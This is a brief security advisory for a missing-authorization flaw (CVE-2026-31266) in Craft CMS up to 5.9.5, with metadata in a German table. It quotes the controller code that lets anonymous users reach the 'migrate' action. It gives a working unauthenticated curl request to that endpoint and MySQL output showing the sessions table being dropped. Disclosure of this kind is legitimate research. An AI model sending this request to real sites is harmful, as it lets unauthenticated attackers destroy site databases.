
Security research on Craft CMS authentication mechanism
| Feld | Wert |
|---|---|
| CVE-ID | CVE-2026-31266 |
| Anbieter | Pixel & Tonic |
| Produkt | Craft CMS |
| Betroffene Versionen | <= 5.9.5 |
| CWE | CWE-862 (Fehlende Autorisierung) |
| CVSS | 7.3 (Hoch) |
| Sicherheitsforscher | 0xRIXET |
screenshots/ - Konzeptnachweis-DemonstrationenDatei: src/controllers/AppController.php
Zeilen 65-68:
protected array|bool|int $allowAnonymous = [
'migrate' => self::ALLOW_ANONYMOUS_LIVE | self::ALLOW_ANONYMOUS_OFFLINE,
];
# With allowAdminChanges=false
curl -X POST "http://target/actions/app/migrate"
mysql> SELECT COUNT(*) FROM sessions;
+----------+
| COUNT(*) |
+----------+
| 0 |
+----------+
mysql> SELECT COUNT(*) FROM sessions;
ERROR 1146 (42S02): Table 'sessions' doesn't exist